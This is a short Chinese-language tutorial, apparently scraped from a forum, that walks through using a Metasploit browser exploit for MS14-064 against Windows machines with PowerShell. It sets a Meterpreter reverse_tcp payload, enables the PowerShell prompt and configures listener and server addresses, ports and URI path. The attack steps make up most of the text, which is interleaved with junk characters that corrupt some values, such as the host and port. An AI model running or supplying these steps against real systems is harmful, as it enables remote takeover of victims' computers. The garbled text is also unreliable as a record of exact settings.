1 w1 Z9 I/ N% ?# Q 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
. }% e' j; f) j% H8 U
/ J" w9 Y5 p9 k i
/ E. w$ ~6 O. c 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 Y" @2 _" L9 D, ^6 P9 m, @
/ [! G ]$ s6 X
" r, `1 P1 [4 w: ], l
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp7 p% R0 l G( Q2 x
7 ]: S6 o' N7 |3 b
7 ^7 k3 y: L, v. e' b3 I! ` set AllowPowershellPrompt true
; t8 i. |6 U! [+ x i0 o
) ?+ I2 R, `( i! J
# F, q: z# M2 |4 x( s; ]
Set LHOST 192.168.0.1092 V j0 [ p! X6 p& W' r4 ~
5 _7 b% K; m+ ^/ a
* q, w4 J* B0 q+ S+ `7 R set SRVHOST 192.168.0.109
, O: l) Z3 n+ p" Q2 ~
+ X; J) t# D$ z( Q j5 g5 m. t/ k" V
# O4 i5 t. l$ [ P# I, F Set uripath share
7 p! ?5 T8 K" I# w* B3 z( W
) e0 T8 B; D' d( M8 D' J
' M/ O. c9 K7 y. C6 g# d( ?
Set srvport 800 p) S" ]; ^4 O! K$ E3 h+ m
5 g; p. F# E2 J" U0 D
4 I) z" N. v- {- ^. m J
' V, s/ `5 S+ a: `
3 _. n7 S! r3 O1 m5 s% p
, e2 }( h2 s+ Y! v1 z" @
Y0 B4 S5 r/ n5 Q& U: h. L) G
$ k. b' l( @& a* B3 R% G
% `3 @, i7 d9 D- l, ?
' r- g' G" x6 W
" L6 ~/ J. C4 }& M9 o L; F/ E/ Z8 O. g7 e/ P$ f
4 Z3 L% _" p! J4 `9 d2 Y
6 ~/ ?) |6 z" ]* R9 v1 @+ k5 ~- r. @* f5 i
- K$ ?0 { j1 X' L1 b: J6 X
O' S$ }, u* q) R7 k8 ?# w$ `6 d
9 C i9 l/ }" y+ N 下面我们来访问本地地址如图:. W0 ~: z( O. C" B
" b* P$ w# P; a; L; G/ }
9 ^7 o8 Z% ]8 n4 l7 f; T
; I& W: G2 m3 X% z% @) P
8 Z/ P s3 }% y+ Z& w
$ a$ E+ q r1 ^1 |
8 N# J, o2 A+ t* [
' j6 b0 c2 k" H# k
' M/ z) w! D F7 G1 D" w$ L
7 b7 {: ? \. X% Y) N